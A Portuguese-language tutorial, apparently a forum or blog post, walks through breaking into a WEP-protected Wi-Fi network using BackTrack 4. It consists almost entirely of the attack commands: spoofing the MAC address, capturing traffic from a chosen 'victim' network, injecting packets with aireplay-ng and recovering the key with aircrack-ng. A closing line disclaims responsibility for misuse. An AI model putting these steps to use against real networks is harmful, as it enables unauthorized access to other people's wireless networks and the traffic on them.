Antes de tudo, se sua placa de rede não entra em modo monitor, ESQUEÇA, caso contrario, siga o tutorial.


Download do BackTrack 4
Download do ImgBurn( Caso abra outra janela, espera 10 segundos e clique no MIRROR 6 ).

Após feito download de ambos os arquivos, instale o ImgBurn e grave a imagem BT4-R1.iso em um DVD.
Coloque o DVD no seu computador novamente, e reinicie ele.
Dê o boot pelo DVD com a imagem gravada.
Quando aparecer uma lista de opções, escolha a que acabar com LIVE-CD.
Login: root
Senha: toor
Feito isso aguarda até que apareça uma linha a espera de um comando, e então digite "startx".

Lembrando que a interface da placa de rede eu usarei wlan0 como exemplo, pois é a mais comum.

Quando o sistema ja estiver pronto, abra um terminal.
Digite -> airmon-ng stop wlan0
Digite -> ifconfigwlan0 down
Digite -> macchanger --mac 00:11:22:33:44:55 wlan0
Digite -> airmon-ng start wlan0
Digite -> airodump-ng wlan0

Feito isso, você irá escolha qual rede quebrar.
Abra um outro terminal.
Digite -> airodump-ng -c (channel) -w (qualque coisa) --bssid (aqui você por o bssid da rede que quer quebrar) wlan0


Abra um outro terminal.
Digite -> aireplay-ng -1 0 -a (bssid da vítima) -h 00:11:22:33:44:55 wlan0

Quando aparecer para você uma mensagem de Sucesso prossiga com os próximos comandos.
Se não aparecer mensagem de sucesso é que o sinal ta muito ruim. Ai você tenta de novo.

Digite -> aireplay-ng -3 -b (bssid da vítima) -h 00:11:22:33:44:55 wlan0
Espere juntar uns 10,000 pacotes.
Quando juntar, feche todos os terminal que estão abertos, e abra outro.

Digite -> aircrack-ng *.cap
Se ele te der uma lista de opções, você escolhe a rede que irá atacar e de um enter. Caso contrário espere que o aircrack irá exibir a chave da rede em Hexadecimal.

Logo mais eu coloco print screen pra explicar melhor.
Quaisquer dúvidas, comente que eu respondo. ;)

Obs: Use somente para seu conhecimento, o uso indevido não é de minha responsabilidade. Pois conhecimento não é crime né ?!